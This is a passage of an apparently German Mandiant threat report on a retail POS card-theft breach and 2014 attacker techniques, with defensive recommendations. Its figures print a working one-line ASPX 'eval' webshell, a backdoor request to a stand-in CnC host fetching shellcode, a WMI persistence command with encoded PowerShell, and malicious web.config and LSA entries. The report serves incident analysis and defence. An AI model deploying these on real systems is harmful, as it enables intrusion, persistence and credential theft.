auf anderen Systemen einloggen. Einrichten von Backdoors Der Angreifer richtete auf mehreren ge­ hackten Systemen „Hintertüren“ ein, um sich dauerhaft Zugang zu ihnen zu sichern. Dazu nutzte er einen schädlichen Geräte- treiber, der speziell für Windows XP ent­ wickelt wurde. Dieser Gerätetreiber wurde zur Übertra- gung mit einem raffinierten Packer kom- primiert, der vergleichbaren Tools in hoch entwickelter, aber gängiger Malware äh- nelte. Der Gerätetreiber extrahiert sich zunächst im Arbeits­speicher und startet dann einen neuen System-Thread. Daraufhin schickt der entsprechende legi- time Gerätetreiber eine Nachricht an das System, dass er nicht geladen werden konnte. Da die Malware in einem anderen Prozess ausgeführt wird als der legitime Gerätetreiber, erkennt das System den zusätzlichen Gerätetreiber nicht. Durch diese Verschleie­rungstaktik wird die Ana­ lyse der Malware und ihrer Funktionen erschwert.
  11. 11. www.mandiant.com 9 So funktioniert psexec_command Der auszuführende Befehl und eine Text­ datei für die Ausgabe werden in eine Windows-Batchdatei geschrieben. Die Ausgabe- und die Batchdatei erhalten von einem Zufallsgenerator generierte Namen, die je 16 Zeichen lang sind. Die Batchdatei wird ausgeführt. Abbildung 1 zeigt, was dabei im System­ ereignisprotokoll von Windows aufge­ zeichnet wird. Abbildung 1: Das Metasploit-Modul psexec_command installiert einen Service. A service was installed in the system. Service Name: MRSWxwQmQxFGumEFsW Service File Name: %COMSPEC% /C echo dir ^> %SYS- TEMDRIVE%WINDOWSTempTthwsVKvUhydrsNB.txt > WINDOWSTempRbhRmgALAHcdyWXG.bat & %COMSPEC% /C start %COMSPEC% /C WINDOWSTempRbhRmgALAHcdyWXG. bat Service Type: user mode service Service Start Type: demand start Die Funktionen dieser Backdoor befinden sich in Shellcode, den der Gerätetreiber in Prozesse einschleust, die im Benutzer- bereich, also außerhalb des Windows- Kernels, ausgeführt werden. Dieser Shell- code schickt dann eine HTTP-POST-Ab- frage an eine hartkodierte IP-Adresse und lädt einen HTML-Kommentar herunter, der mit XOR kodierten Shellcode enthält. Dank dieser Methode war die Backdoor sehr vielseitig einsetzbar. Wenn der An- greifer neue Funktionen benötigte, konn­ te er einfach neuen Shellcode herunter- laden und ausführen. Diese Nutzung von Shellcode ist nicht neu, aber durch die Kombination mit dem Packer war sie we­ sentlich schwerer zu finden als ältere Varianten. Abbildung 2 zeigt die Kommunikation zwischen der Backdoor und dem Command-und-Control-Server (CnC- Server). Datendiebstahl Nachdem er das Kennwort des Domänen- administrators geknackt hatte, stand dem Angreifer die gesamte Windows-Umge- bung der Kaufhauskette offen. Abbildung 2: Kommunikation zwischen CnC-Server und Backdoor POST /evil.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Evil_UA_String Host: 1.2.3.4 Pragma: no-cache <POST_DATA> <!-XOR_Encoded_Shellcode --> Backdoor schickt HTTP-POST- Abfrage an CnC-Server. Mit XOR kodierter Shellcode wird heruntergeladen und ausgeführt. gehacktes System CnC-Server des Angreifers
  12. 12. 10 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Alle POS-Terminals in der gesamten Kauf- hauskette nutzten denselben Domänen- controller für die Authentifizierung. Wer also Zugang zum Domänencontroller der Verkaufsdomäne hatte, konnte direkt auf alle POS-Terminals zugreifen. Er konzentrierte sich jedoch auf die Ver- kaufsumgebung. Diese Umgebung war wie folgt konfigu­ riert: • Zwischen der Verkaufsdomäne und der Zentraldomäne des Unterneh- mens war ein Two-Way-Trust konfiguriert. • Auf den POS-Terminals lief Microsoft Windows XP. • Die POS-Terminals waren mit der Verkaufsdomäne verbunden. Diese im Einzelhandel weit verbreitete Konfiguration hat zwei Schwachpunkte, die der Angreifer ausnutzen konnte. Erstens konnte er die zuvor erbeuteten Anmeldedaten des Domänenadministra- tors der Zentraldomäne nutzen, um privi­ legierten Zugriff auf die Verkaufsdomäne zu erlangen. Zweitens war die Verkaufsdomäne eine untergeordnete Domäne der Zentraldo­ mäne. Manche Funktionen funktionierten nur, wenn bestimmte wichtige Ports zwi­ schen der Zentral- und Verkaufsdomäne offen blieben. Über diese offenen Ports konnten jedoch alle Firewall-Kontrollen der Kaufhauskette um­gangen werden. Der Angreifer nutzte diese offenen Ports, um auf den Domänencontroller zuzugrei­ fen und von dort in die Verkaufsdomäne zu gelangen. Alle POS-Terminals in der gesamten Kauf- hauskette nutzten denselben Domänen- controller für die Authentifizie­rung. Wer also Zugang zum Domänencontroller der Verkaufsdomäne hatte, konnte direkt auf alle POS-Terminals zugreifen. Der Angrei­ fer nutzte eine Windows-Batchdatei auf dem Domä­nencontroller der Verkaufsdo­ mäne, um alle POS-Terminals in der ge­ samten Kaufhauskette mit Malware zum Stehlen von Kreditkartendaten zu infizie- ren. Der Angreifer führte die Malware als ge- plante Windows-Aufgabe aus. Die auf den POS-Terminals installierte Malware las die auf dem Magnetstreifen der Kreditkarten gespeicherten Kartennummern und das Ablaufdatum sowie weitere Transaktions- details aus dem Prozessspeicher der POS-Anwendung aus und sammelte sie. Angreifer können diese Daten an andere Kriminelle verkaufen, die Kreditkarten fälschen. Zum Erfassen der Kreditkarten- und Transaktionsdaten nutzte die Malware OSQL, ein befehlszeilenbasiertes Tool für SQL-Abfragen, das bereits auf den POS- Terminals installiert war. Die gestohlenen Daten wurden dann in einer temporären MSSQL-Datenbank namens tempdb gespeichert. Wenn MSSQL gestoppt wird, werden alle Daten in tempdb automatisch gelöscht. Einmal täglich startete der Angreifer eine SQL-Abfrage, um die Daten aus den tempdb aller POS-Terminals in einer Textdatei auf dem Domänencontrol­ ler zu speichern. Dort archivierte er die Textdatei und schickte sie an eine mit dem Internet ver­ bundene Workstation in der Verkaufsdo­ mäne. Von dieser Workstation aus konnte er die archivierte Datei mit den gestohle­ nen Daten per FTP an einen von ihm kon­ trollierten Server schicken. Abbildung 3 stellt den Verlauf des Angriffs grafisch dar.
  13. 13. www.mandiant.com 11 Abbildung 3: Verlauf des Angriffs Der Angreifer bricht aus der virtualisierten Anwendungsumgebung aus und erkundet das Unternehmensnetzwerk. Dort erbeutet er Anmeldedaten für weitere Systeme. 2 Der Angreifer nutzt den Domänencontroller der Verkaufsdomäne, um auf die POS-Termi- nals zuzugreifen und sie mit Malware zum Stehlen von Kreditkarten- und Transaktions- daten zu infizieren. 3 Der Angreifer meldet sich mit gültigen Anmeldedaten per Fernzugriff an einem Server des Opfers an, auf dem eine virtualisierte Anwendung läuft. 1 Der Angreifer überträgt die gestohlenen Daten von den POS-Terminals über den Domänencontroller der Verkaufsdomäne auf eine Benutzer-Workstation in derselben Domäne. Von dort überträgt er sie mit FTP auf einen externen Server. 4 virtueller Anwendungs- server Haupt- domänen- controller Domänencon- troller der Verkaufs- domäne Benutzer- Workstation erster Zugriff Ausschleusen der Daten via FTP Benutzer- Workstation POS-Ter- minal 1 POS-Ter- minal 2 Laden 2 VerkaufsdomäneZentraldomäne DMZ POS-Ter- minal1 POS-Ter- minal 2 Laden 1 Kommunika- tion mit dem CnC-Server Angreifer
  14. 14. 12 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Fazit : Wo Geld ist, sind auch Kriminelle nicht weit. Einzelhändler gehören schon seit Langem zu den bevorzugten Zielen von Internetkriminellen. Daran hat sich auch 2014 nichts geändert. Die Angreifer nutzten zwar einige neue Angriffsma­schen und das Medieninteresse an ihren Aktivitäten stieg, doch ihr „Modus Operandi“ hat sich im Vergleich zu den Vorjahren nicht grundlegend geändert. Empfehlungen Der in der Fallstudie beschriebene Angriff wäre so in Europa nicht möglich, doch auch hier rollt eine regel- rechte Lawine von Angriffen auf Online-Händler und andere Unternehmen zu, die Online-Transaktionen abwickeln. Sie können nicht jeden Angriff abwehren, doch die folgenden Maßnahmen erschweren es An- greifern, in Ihre Umgebung einzudringen und diese auszuspionieren. Mit den richtigen Tools und einem wachsamen Sicherheitsteam können Sie den Verlauf eines Angriffs verlangsa­men. Dadurch gewinnen Sie Zeit, um den Angriff aufzudecken, zu untersuchen und zu reagieren, bevor der Angreifer sein Ziel erreicht hat. Sicherer Fernzugriff Analysieren Sie, mit welchen Methoden Ihre Angestellten, externe Mitarbeiter und Zuliefe­ rer per Fernzugriff auf Ihre Infrastruktur zu- greifen. Bemühen Sie sich, die Anzahl der ver- fügbaren Zugriffsmethoden, die Anzahl der autori­sierten Nutzer und alle anderen Aspekte des Fernzugriffs auf ein kontrollierbares Maß einzuschränken. Legen Sie Richtlinien für starke Kennwörter fest und stellen Sie alle Zugriffs- methoden auf Zwei-Faktor-Authentifizierung um. Durchsuchen Sie die Logdateien für den Fernzugriff kontinuierlich nach Anzeichen ver­ dächtiger Aktivitäten. Sicherer Zugang zur PCI- DSS-Umgebung Schotten Sie Ihre Umgebung für Zahlungen ge­ mäß dem Payment Card Industry Data Security Standard (PCI DSS) vom Rest Ihres Intranets ab. Der Zugang zu Systemen in der PCI-DSS- Umgebung sollte nur über einen von einem siche­ren Jumpserver kontrollierten Tunnel möglich sein. Damit befinden sich Ihre POS- Terminals effektiv in einem Hochsicherheits- bereich. Der Zugriff auf den Jumpserver sollte mit Zwei-Faktor-Authentifzierung gesichert sein. Trennen Sie die Verkaufsdomäne nach Möglich- keit vom Rest des Intranets ab, um die Anzahl der möglichen Einfallstore für diese Domäne zu minimieren. Als zusätzliche Sicherheitsmaß­ nahme sollte der Aufbau von Netzwerkverbin­ dungen aus der Verkaufsdomäne auf Verbindun­ gen zu einer genehmigten Liste geprüfter IP- Adressen beschränkt werden, die für den Geschäftsablauf erforderlich sind. Whitelist von Anwendungen für kritische Ressourcen Um das Risiko einer Malware-Infektion sicher- heitskritischer Systeme zu minimieren, sollten auf diesen Systemen nur Anwendungen ausge­ führt werden dürfen, die sich auf einer Whitelist geprüfter und genehmigter Anwendungen be- finden. Als sicherheitskritisch sollten alle Jump- server, Domänencontroller und sämtliche Syste­ me gelten, auf denen Kreditkartendaten verar- beitet werden. Management privilegierter Konten Privilegierte Konten sind für Angreifer beson- ders interessant, darunter das des Systemad- ministrators und des Domänenadministrators sowie Dienstkonten. Halten Sie die Anzahl pri­ vilegierter Konten so niedrig wie möglich. Sor- gen Sie dafür, dass die Systemadministrator­ konten für verschiedene Systeme unterschied­ liche Kennwörter haben. Erwägen Sie den Ein- satz einer Kennwortverwaltung zur Unterstüt­ zung Ihrer Systemadministratoren bei der Ver- waltung zahlreicher verschiedener Kennwörter. Manche dieser Tools können Kennwörter auto­ matisch nach jeder Nutzung ändern, um das Knacken privilegierter Konten zusätzlich zu er- schweren.
  15. 15. www.mandiant.com 13 E s ist eine Art Wettrüsten: Sicherheitsteams implementieren neue Sicherheitsmaßnah­ men und Angreifer finden Wege, um diese Maßnahmen zu umgehen. Das blieb auch 2014 so. Wir untersuchten mehr Vorfälle, bei denen Angrei­ fer das VPN des Opfers hackten, um sich dauer­ haften Zugang zu seiner Infrastruktur zu verschaf- fen. Zudem beobachteten wir clevere neue Tricks, um unentdeckt zu bleiben, sowie neue Tools und Methoden zum Stehlen von Anmeldedaten und Ausspionieren gehackter Umgebungen. Hacken von VPN Ein Hacker, der sich Zugriff auf das VPN seines Opfers verschaffen kann, hat zwei große Vorteile. Erstens hat er dadurch dauerhaft Zugang zur ge- hackten Infrastruktur, ohne Backdoors einrichten zu müssen. Zweitens kann er privile­gierte Nutzer nachahmen, um unauffällig zu bleiben. Wir hatten bereits in früheren Jahren beobach- tet, dass manche Angreifergruppen gezielt VPN- Ressourcen und -Anmeldedaten ins Visier nehmen, sobald sie in ein Netzwerk eingedrungen sind. Doch 2014 wurde ein neuer Rekord gesetzt: Wir sahen mehr Fälle, in denen Angreifer Zugang zum VPN ihres Opfer erlangten, als je zuvor. Bei den meisten dieser Angriffe wurde eine der fol- genden beiden Methoden genutzt: • Ein-Faktor-Authentifizierung: Wo nur ein Benutzername und Kennwort erforderlich waren, um auf das VPN zuzugreifen, nutzten die Angreifer Anmeldedaten, die sie von einem gehackten Computer oder der gehackten Active-Directory-Domain gestohlen hatten. • Zertifikatsbasierte Zwei-Faktor-Authenti­ fizierung: Wo das VPN des Opfers ein benutzerspezifisches digitales Zertifikat als zweiten Authentifizierungsfaktor verlangte, nutzten Angreifer gängige Tools wie Mimikatz, Trend Nr. 3: Raffiniertere Angriffsabläufe Die meisten von uns untersuchten Vorfälle folgen demselben Schema. Wir nennen dies den Lebenszyklus eines Angriffs. um diese Zertifikate von gehackten Benutzer- computern zu extrahieren. In einigen Fällen gelang es den Angreifern auch, VPN-Zertifika­ te abzufangen, die über unsichere Kommuni­ kationskanäle an ihre legitimen Eigentümer geschickt wurden, beispielsweise als Anhang einer unver­schlüsselten E-Mail oder über eine offene Netzwerkfreigabe. In seltenen Fällen nutzten Angreifer Methoden, mit denen die VPN-Authentifizierung komplett umgangen werden konnte. Ein solches Beispiel war „Heartbleed“, eine Schwachstelle in der Erweite­ rung Heartbeat des Protokolls Transport Layer Se- curity (TLS), die im April 2014 Schlagzeilen machte. Angreifer konnten betroffene Systeme und Geräte dazu bringen, bei jeder Abfrage bis zu 64 Kilobyte Daten aus dem Systemspeicher preiszugeben. Forscher bezweifelten zunächst, dass mit dieser Methode tatsächlich sensible Daten wie Verschlüs- selungsschlüssel oder Anmeldedaten von echten Systemen gestohlen werden konnten. Die schlimmsten Befürchtungen erwiesen sich je­ doch als zutreffend. Wenige Wochen nach Bekannt­ werden von Heartbleed untersuchten wir einen Fall, in dem der Angreifer diese Schwachstelle in ei- nem VPN-Gerät ausnutzte, um die authentifizierten Sitzungen autorisierter Nutzer zu übernehmen und sich – völlig ohne Anmeldedaten – Zugang zum VPN zu verschaffen. In den folgenden Wochen nutzten Angreifer Heartbleed, um in die VPN-Infrastruktu­ ren weiterer Opfer einzudringen. Bessere Tarnung für Malware Die Malwareerkennung ist mit einem ständigen Wettrüsten zwischen Angreifern und Verteidigern vergleichbar. Das bestätigte sich auch 2014 wieder. Angreifer fanden mehrere neue Methoden, um ihre Aktionen zu verschleiern und Malware auf infizier- ten Systemen zu verbergen.
  16. 16. 14 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Bessere Verstecke für Webshells Webbasierte Backdoors, die sogenannten Web- shells, sind ein mindestens zehn Jahre alter Mal- waretyp. Dank neuer Methoden bleiben sie bei netzwerk- und hostbasierten Malwarescans unent- deckt und gehören weiterhin zu den bevorzugten Tools für gezielte Angriffe. In mehreren von uns untersuchten Fällen hatten Angreifer ihre Webshell auf einem Server mit SSL- Verschlüsselung (Secure Socket Layer) installiert. Dadurch wurden alle mit der Backdoor ausge­ tauschten Daten mit dem privaten Schlüssel des Servers verschlüsselt. Da die Opfer ihre Netzwerk- architektur so konfiguriert hatten, dass ihre Sicher- heitstools mit SSL verschlüsselte Daten nicht unter- suchen konnten, wurden die Aktivitäten des Angrei­ fers nicht erkannt. Wir gehen davon aus, dass diese Angriffsform in Zukunft häufiger genutzt werden wird, da die SSL- Verschlüsselung in immer mehr Unternehmen auf alle öffentlich zugänglichen Bereiche der Website ausgedehnt wird. Abbildung 4: Neue Angriffsmethoden, die Mandiant bei Untersuchungen beobachtete Eindringen Fuß fassen Privilegien ausweiten Umgebung ausspionieren Ziel erreicht weitere Systeme infizieren unent- deckt bleiben Hacken von VPN Mandiant beobachtete 2014 eine Rekordzahl von Fällen, in denen Angreifer sich Zugang zum VPN ihres Opfers verschafften. Schädliche Sicherheitspakete Angreifer nutzten die Windows Security Package Extensibility aus, um Backdoors und Kennwortlogger zu installieren. Verstecken von Webshells Angreifer fanden auch 2014 wieder neue Maschen zum Einschleusen und Verstecken webbasierter Malware. Unter den von Mandiant beobachteten Methoden waren: • Installieren schädlicher Shells auf Servern mit SSL-Verschlüsselung, um die Netzwerküber- wachung zu umgehen, • Einbetten einer einzigen Shellcode-Zeile mit dem Kommando „eval“ in eine seriöse Website, • Ändern von Serverkonfigurationsdateien zum Laden schädlicher DLLs. Einsatz von WMI und Power- Shell Angreifer nutzen zunehmend WMI und PowerShell, zwei leistungs- starke Windows-Komponenten, um dauerhaft Zugang zu einer Infrastruktur zu erhalten, diese auszuspionieren und Daten zu stehlen. Kerberos-Angriffe Nachdem sie sich die Zugriffsrechte eines Domänenadminis- trators verschafft hatten, konnten Angreifer sich mit dem sogenannten „Kerberos Golden Ticket“ Zugang zu beliebigen anderen privilegierten Konten verschaffen – selbst nachdem alle Kennwörter in der Domäne geändert worden waren. Unverschlüsselte Kennwörter Angreifer nutzten neu kompilierte Varianten des Tools Mimikatz, um unverschlüsselte Kennwörter aus dem Arbeitsspeicher zu stehlen, ohne von Antivirensoftware entdeckt zu werden. Wenn Schutzmaßnahmen weiter- entwickelt werden, passen Angrei- fer sich an und finden neue Angriffsmethoden. Im Jahr 2014 beobachteten wir auf jeder Etappe des Angriffs-Lebenszyklus neue Methoden. Im Folgenden stellen wir einige der Ergebnisse vor. In einer anderen von uns beobachteten Angriffs- form wurde eine Shell in eine Webseite des Ziel­ unternehmens eingeschleust. Diese Shell enthielt das Kommando „eval“, das per HTTP-Abfrage über- mittelten Shellcode ausführt und damit hervorra- gend als Backdoor geeignet ist. Der Code für eine Shell mit dem Kommando „eval“ kann weniger als 100 Byte lang sein und lässt sich daher leicht in ei­ ner größeren HTML-Datei verstecken. Auf normale HTTP-Abfragen reagiert die gehackte Webseite weiterhin wie zuvor. Doch wenn ein An- greifer die Seite mit dem richtigen Parameter auf­ ruft, führt das Kommando „eval“ den übermittelten schädlichen Code aus. Abbildung 5 zeigt den Code für eine Shell mit dem Kommando „eval“. Dies ist eine vollständige Shell, die so in einer eigenen Webseite implementiert oder in eine andere Website eingebettet werden könnte. Der Angreifer würde seinen schädlichen Code als Parameter p1 der HTTP-Abfrage übermit- teln.
  17. 17. www.mandiant.com 15 In vergangenen Jahren hatten wir nur wenige WMI- basierte Angriffe beobachtet. Das lag vermutlich daran, dass die Nutzung von WMI recht kompliziert ist und den meisten Angreifern einfachere Metho- den ausreichten, um in einer gehackten Umgebung unentdeckt zu bleiben. Im Jahr 2014 beobachteten wir jedoch mehrere Angreifergruppen, die WMI für diesen Zweck einsetzten. Für die von uns beobachtete Methode erstellten die Angreifer drei WMI-Objekte, in der Regel mit PowerShell: • Ereignisfilter: Der Filter ermittelt, ob ein bestimmtes, häufig auftretendes Ereignis eingetreten ist, beispielsweise eine bestimmte Tageszeit oder der Ablauf einer vorgegebenen Anzahl von Sekunden seit dem letzten Systemstart. • Ereignisempfänger: Der Empfänger führt ein bestimmtes Skript bzw. einen bestimmten Befehl aus, wenn das Ereignis eintritt. Die meisten der von uns beobachteten Angreifer erstellten befehlszeilenbasierte Ereignisemp- fänger, die beliebige Befehle und Argumente ausführen konnten, oder auf Active Script basierende Ereignisempfänger, die VBS- Skripte ausführten. • Verbindung zwischen Filter und Empfänger: Die Verbindung sorgt dafür, dass ein bestimm­ ter Empfänger aufgerufen wird, wenn das in einem Filter spezifizierte Ereignis eintritt. Abbildung 8 zeigt ein Beispiel für einen PowerShell- Befehl, der einen befehlszeilenbasierten Ereignis- empfänger erstellt. Dieser Empfänger führt power- shell.exe mit einem in Base64-codierten String als Argument aus. Abbildung 5: Beispiel einer Webshell mit „eval“ <%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%> Abbildung 6: Auszug aus der gehackten Datei web.config <!--HTTP Modules --> <modules> <add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” /> </modules> Als letztes Beispiel in diesem Abschnitt möchten wir Sie auf eine besonders raffinierte Masche für die webbasierte Übertragung von Malware auf- merksam machen: Die Angreifer änderten die Kon- figurationsdatei web.config der Microsoft Internet Information Services (IIS) auf einem Webserver. Das veranlasste den Server, ein schädliches HTTP- Modul zu laden. Abbildung 6 zeigt eine editierte Version der Änderung in web.config. Mit dieser Änderung wird der Server angewiesen, die Bibliothek BadModule.dll aus einem Shared Modules Directory zu laden und zur Bearbeitung aller folgenden Webabfragen zu nutzen. Die Mal- ware scannte und speicherte die Inhalte aller an den Server gerichteten Webabfragen, einschließ­ lich aller von Benutzern übermittelten Anmeldeda­ ten. Das in Abbildung 6 gezeigte Beispiel wurde von uns geändert. Der Angreifer gab dem schädlichen Modul den Namen einer echten Microsoft-DLL und änderte den Zeitstempel der Malware und der Kon- figurationsdatei, um seine Spuren zu verwischen. Dauerhafter Zugang mit WMI Die Windows-Verwaltungsinstrumentation (Win- dows Management Instrumentation, WMI), eine Kernkomponente des Betriebssystems Windows, enthält ein breites Spektrum an Funktionen und Benutzer­oberflächen für die Systemverwaltung. Anwendungen und Skriptsprachen wie PowerShell und VBScript können die WMI nutzen, um Daten zu erfassen, auf Komponenten auf den unteren Ebe­ nen des Betriebssystems zuzugreifen und Befehle auszuführen. Darüber hinaus enthält die WMI ein Ereignisframework, das die Ausführung einer vom Benutzer angegebenen Anwendung veranlassen kann, wenn der Status eines bestimmten Objekts sich ändert. Anstelle einer seriösen Anwendung ließen die von uns beobachteten Angreifer Malware ausführen.
  18. 18. 16 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Abbildung 7: So verschafften Angreifer sich mit WMI dauerhaften Zugriff WMI testet regelmäßig, ob das im Ereignisfilter spezifizierte Ereignis eingetreten ist. In diesem Beispiel wird die Bedingung täglich um 8.05 Uhr erfüllt.2 Wenn das im Filter spezifizierte Ereignis eintritt, ruft WMI automatisch den mit diesem Filter verbundenen Ereignisempfänger auf. Das Beispiel zeigt einen Teil eines befehls- zeilenbasierten Ereignisempfängers, der PowerShell mit zusätzlicher Malware ausführt, die vom Angreifer als Base64-codierter Parameter bereitgestellt wird. 3 Mit PowerShell-Befehlen erstellt der Angreifer drei Ereignisobjekte in WMI: einen Empfänger, der einen Befehl oder ein Skript ausführt, einen Filter, der das System auf eine häufig auftre- tende Situation überprüft, und eine Verbindung zwischen dem Filter und dem Empfänger. 1 WMI-Namespace (rootsubscription) Ereignisempfänger „Führe dieses Skript/ diesen Befehl aus …“ Ereignisfilter „Frage nach, ob dieses Ereignis eingetreten ist …“ Verbindung zwischen Filter und Empfänger „Nutze diesen Filter, um den Empfänger aufzurufen.“ Set-WmiInstance SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60 CommandLineTemplate="C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe –NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..."
  19. 19. www.mandiant.com 17 Der String könnte zusätzlichen PowerShell-Code enthalten, beispielsweise ein einfaches Download- Tool oder eine Backdoor, und den Angreifern so das Installieren einer Skriptdatei auf der Festplatte er- sparen. Wenn dieser Empfänger mit einem geeig­ neten Ereignisfilter verbunden wäre, könnte er wie- derholt ausgeführt werden. WMI-basierte Methoden für den langfristigen Zu- griff auf eine gehackte Infrastruktur sind bei einer forensischen Analyse nur schwer zu erkennen, da die Angreifer Ereignisfilter und -empfänger auf eine­m System definieren und diese mithilfe von PowerShell-Befehlen auf demselben oder einem anderen System ausführen können. Im Gegensatz zu vielen anderen Methoden für den Erhalt eines dauerhaften Zugriffs hinterlässt dies auch keine Spuren in der Registry. Die Objekte befinden sich im WMI-Repository ob- jects.data, einer komplexen Datenbank auf der Fest- platte, die sich nicht leicht auf schädliche Objekte durchsuchen lässt. Darüber hinaus überprüft Win- dows neu erstellte oder aktivierte Ereignisfilter und -empfänger nur, wenn die Protokollierung auf der Debug-Ebene aktiviert ist. Dabei wird jedoch eine so hohe Anzahl von Ereignissen aufgezeichnet, dass dies nicht die Standardoption ist und die langfristi­ ge Nutzung nicht empfohlen wird.5 Schädliche Sicherheitsmodule Wir haben mehrere Fälle untersucht, in denen An- greifer Sicherheitsmodule in der lokalen Sicherheits­ autorität (Windows Local Security Authority, LSA) ausnutzten, um automatisch und unbemerkt Mal- ware herunterzuladen. Sicher­heitsmodule sind DLL-Dateien, die unter ver­schiedenen Werten un- ter dem Registrierungs­schlüssel HKLMSYSTEM CurrentControlSetControlLsa konfiguriert und beim Systemstart von der LSA geladen werden. Jeder dieser Werte enthält eine Liste von Dateinamen (ohne die Dateierweiterung), die von %SYSTEM- ROOT%system32 zu laden sind. Da LSA-Module automatisch von LSASS.EXE gela­ den werden, kann ein Angreifer mit Administrator- rechten diese Liste erweitern oder ändern, um bei jedem Systemstart schädliche DLLs zu laden. In ei- nem von uns 2014 untersuchten Fall änderte der Angreifer den Wert von Security Packages, um si- cherzustellen, dass das zum Herunterladen genutz- te Tool der aus mehreren Komponenten bestehen- den Backdoor tspkgEx.dll auf dem System verblieb.6 Abbildung 9 zeigt den geänderten Wert. Diese Änderung veranlasst LSASS.EXE, bei jedem Systemstart C:WINDOWSsystem32tspkgEx.dll zu laden. 5 Auf der Mandiant-Konferenz MIRcon 2014 wurden Vorträge zu den Themen WMI und PowerShell gehalten, die diese Methoden ausführlicher be­ schrieben. Die Vorträge enthielten Fallstudien und Ratschläge für das Aufdecken und die forensische Analyse. Die Präsentationen sind unter https://dl. mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_There%27s_Something_About_WMI.pdf und https://dl.mandiant.com/EE/library/MIR- con2014/MIRcon_2014_IR_Track_Investigating_Powershell_Attacks.pdf verfügbar. 6 DLL-Name von uns geändert. Abbildung 8: Auszug aus einem PowerShell-Befehl zum Erstellen eines WMI-Empfängers Set-WmiInstance -Namespace “rootsubscription” -Class ‘CommandLineEventConsum- er’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:WINDOWSSystem32Win- dowsPowerShellv1.0powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8A- bQ...<SNIP>”;RunInteractively=’false’} Abbildung 9: Geänderte HKLMSYSTEMCurrentControlSetControlLsaSecurity Packages, die Malware lädt SECURITY PACKAGES (unverändert): kerberos msv1_0 schannel wdigest tspkg pku2u SECURITY PACKAGES (geändert): kerberos msv1_0 schannel wdigest tspkg pku2u tspkgEx
  20. 20. 18 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Da LSA erweiterbar ist, kann es auch um speziell erstell­te Module erweitert werden, die beim Login die Anmeldedaten des Benutzers über­prüfen. Ein schädliches „Sicherheitsmodul“ kann diese Funktion missbrauchen, um bei Anmeldeversuchen unver- schlüsselte Kennwörter abzufangen. Wir untersuchten 2014 einen gezielten Angriff, bei dem der Angreifer Malware für genau diesen Zweck als „Sicherheitsmodul“ lud. Das weit verbreitete Toolkit Mimikatz7 enthält ebenfalls ein „Sicherheits- modul“ zum Stehlen von Kennwörtern, mimilib.ssp.8 Tools und Tricks für den Kennwort- diebstahl Tools zum Stehlen von Anmeldedaten sind auf dem Schwarzmarkt inzwischen so weit verbreitet, dass das Entwenden von Kennwörtern und das Erlangen von Zugriffsrechten in Windows-Umgebungen deutlich einfacher sind als früher. Bei gezielten An- griffen kam 2014 meist eine der beiden folgenden Methoden zum Einsatz: • „Pass the Hash“, also die Anmeldung mit einem gestohlenen NTLM-Hashwert, ohne diesen zu knacken, • Stehlen unverschlüsselter Kennwörter aus dem Arbeitsspeicher mit Mimikatz. In Windows Server 2012 R2 und Windows 8.1 hat Microsoft die Wirksamkeit dieser Methoden einge­ schränkt, völlig unmöglich sind sie dadurch jedoch noch immer nicht. Die meisten Kunden, mit denen wir im vergangenen Jahr zusammenarbeiteten, nutzten außerdem noch Domänen mit Windows Server 2008 und Endpunkte mit Windows 7. „Pass the Hash“ ist daher eine bewährte und weiterhin erfolg­versprechende Methode, insbesondere wenn mehrere Systeme in einer Umgebung dasselbe Ad- ministratorkennwort haben. Mimikatz geht einen Schritt weiter: Es stiehlt un- verschlüsselte Windows-Kennwörter, die vom Sys- tem im Arbeitsspeicher abgelegt wurden, um ver- schiedene Formen von Single-Sign-On zu unter- stützen. Auf dem Computer eines Mitarbeiters sind die Aus- wirkungen eines solchen Angriffs wahrscheinlich auf den Diebstahl des Domänenkennworts dieses Mitarbeiters begrenzt. Auf einem gemein­sam ge- nutzten Server, auf dem viele Benutzer sich mit dem Remote Desktop Protocol (RDP), dem Tool PsExec oder anderen Methoden interaktiv anmel­ den, könnten dagegen potenziell sehr viele Kenn­ wörter gestohlen werden. Die Opfer eines solchen Angriffs sind meist überrascht, wie schnell ein An- greifer eine ganze Domäne in Active Directory un- ter seine Kontrolle bringen kann, nachdem er sich Zugang zu einigen wenigen Systemen verschafft hat. In fast allen von uns untersuchten Fällen wurde Mimikatz von der Antivirensoftware des Opfers weder erkannt noch abgewehrt, obwohl dieses Tool weit verbreitet und sehr bekannt ist. Die meisten Angreifer änderten den Quellcode leicht oder kom­ pilierten ihn einfach nur neu, um Antivirensoftware zu umgehen. Manche nutzten auch Variationen wie das PowerShell-Skript „Invoke-Mimikatz“, das voll- ständig im Arbeitsspeicher ausgeführt werden kann. Außerdem beobachteten wir 2014 mehrere neue Angriffsmethoden, die auf den Authentifizierungs- mechanismus Kerberos abzielten, der in modernen Windows-Domänen standardmäßig verwendet wird. Die Mimikatz-Masche „Golden Ticket“ ist viel- leicht die gefährlichste und berüchtigtste dieser Methoden. Mit ihr kann ein Angreifer, der einen Domänencontroller gehackt hat, ein Kerberos- Ticket erstellen, das das Zuweisen beliebiger Zu- griffsrechte an andere Benutzer erlaubt. In fast allen von uns untersuchten Fällen wurde Mimikatz von der Anti- virensoftware des Opfers weder erkannt noch abgewehrt, obwohl dieses Tool weit verbreitet und sehr bekannt ist. Die meisten Angreifer änderten den Quellcode leicht oder kompilierten ihn einfach nur neu, um Antiviren- software zu umgehen. 7 https://github.com/gentilkiwi/mimikatz5 8 Auf der Mandiant-Konferenz MIRcon 2014 präsentierte Matt Graeber weitere Untersuchungsergebnisse zu schädlichen Sicherheitsmodulen sowie Hinweise zu deren Aufdeckung und Abwehr. Diese Präsentation ist unter 